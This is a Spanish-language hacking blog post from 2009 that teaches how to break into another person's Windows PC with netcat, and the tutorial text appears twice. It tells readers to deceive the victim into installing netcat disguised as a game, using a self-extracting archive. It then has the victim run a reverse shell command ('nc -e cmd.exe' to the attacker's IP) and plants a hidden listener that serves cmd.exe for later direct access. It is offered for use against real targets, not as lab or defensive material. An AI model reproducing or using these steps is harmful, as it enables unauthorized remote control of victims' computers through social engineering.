Entrar en un pc remotamente
by Skhack on Nov.22, 2009, under hack, hacking, informatica, netcat
Hola a tod@s. Hoy os voy a explicar como entrar en un pc remotamente mediante netcat.
En primer lugar hay que dar mucho uso a la ingenieria social, la cual explicare a continuación.
1.-INGENIERIA SOCIAL
ingeniería social es persuadir o manipular a una persona para que haga lo que queramos sin que la persona sepa que esta siendo obligada.
2.- NETCAT
Lo primero que tenemos que hacer es lograr que el netcat se instale en el system32 de la víctima. Para ello podemos hacerlo mediante un SFX
y decirle que es un juego o algo así.
Cuando ya esté el netcat en su system32 (y por supuesto en el tuyo) tienes que abrirte un puerto, para ello usamos este codigo:
nc -v -L -p puerto --> donde pone puerto tienes que poner el nº del puerto que quieras abrir, por ejemplo 60.
Ahora tienes que lograr que la victima ejecute este comando: nc -e cmd.exe ip puerto
En ip va tu nº de ip y en puerto, ya sabes, va el nº de puerto que hallas abierto.
Este codigo sirve para que los paquetes te los envie la victima a ti, se llama conexion inversa.
Bueno una vez hecho todo esto ya estareis dentro de su shell y podreis hacer lo que querais, pero claro para manejaros tendreis que saber usar los
comandos de la cmd.
La siguiente parte es realizar una conexion directa, para ello teneis que escribir el siguiente codigo en la shell en la que os hallais introducido.
start nc.exe -d -v -L -p puerto -e cmd.exe -> y ya sabeis en puerto poner el puerto que querais abrirle.
Una vez hecho esto abris otra cmd vuestra y escribis nc ip puerto --> en ip poneis la ip remota y en puerto el puerto que le hallais abierto a la otra persona.
Para saver la ip de la victima tendreis que haber hecho un ipconfig antes de abrirle el puerto.
Con esto acaba este mini tuto para entrar en shells remotas desde vuestro ordenador.
-->Skhack<--
En primer lugar hay que dar mucho uso a la ingenieria social, la cual explicare a continuación.
1.-INGENIERIA SOCIAL
ingeniería social es persuadir o manipular a una persona para que haga lo que queramos sin que la persona sepa que esta siendo obligada.
2.- NETCAT
Lo primero que tenemos que hacer es lograr que el netcat se instale en el system32 de la víctima. Para ello podemos hacerlo mediante un SFX
y decirle que es un juego o algo así.
Cuando ya esté el netcat en su system32 (y por supuesto en el tuyo) tienes que abrirte un puerto, para ello usamos este codigo:
nc -v -L -p puerto --> donde pone puerto tienes que poner el nº del puerto que quieras abrir, por ejemplo 60.
Ahora tienes que lograr que la victima ejecute este comando: nc -e cmd.exe ip puerto
En ip va tu nº de ip y en puerto, ya sabes, va el nº de puerto que hallas abierto.
Este codigo sirve para que los paquetes te los envie la victima a ti, se llama conexion inversa.
Bueno una vez hecho todo esto ya estareis dentro de su shell y podreis hacer lo que querais, pero claro para manejaros tendreis que saber usar los
comandos de la cmd.
La siguiente parte es realizar una conexion directa, para ello teneis que escribir el siguiente codigo en la shell en la que os hallais introducido.
start nc.exe -d -v -L -p puerto -e cmd.exe -> y ya sabeis en puerto poner el puerto que querais abrirle.
Una vez hecho esto abris otra cmd vuestra y escribis nc ip puerto --> en ip poneis la ip remota y en puerto el puerto que le hallais abierto a la otra persona.
Para saver la ip de la victima tendreis que haber hecho un ipconfig antes de abrirle el puerto.
Con esto acaba este mini tuto para entrar en shells remotas desde vuestro ordenador.
-->Skhack<--
Páginas
Archivos
Equipo Llamemoslo-x
Administradores
-Skhack
-Fayre
Participantes
-Kidtowers
Síguenos
Contacta con nosotros
Aquí os dejamos nuestra dirección de correo electrónico para que contacteis con nosotros por cualquier motivo:
llamemoslox.contacto@gmail.com
Gracias por haber visitado nuestro blog.
att. El equipo de --Llamemoslo X--
llamemoslox.contacto@gmail.com
Gracias por haber visitado nuestro blog.
att. El equipo de --Llamemoslo X--
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL27C-DnIauWWUg4lUFIRaWLPDKokmMZLTEs70DqNSjHs-26WFSwi_KbdtmgUMkKYAwB2gNyoOli5mHtIkM5aONnbWiLmsfTSUO5T-lV27BNlgpO2saPb1EnueEit5HYBPtqMFPsGtyfk/s241/radiolibre_logo.jpg)
0 comentarios
Publicar un comentario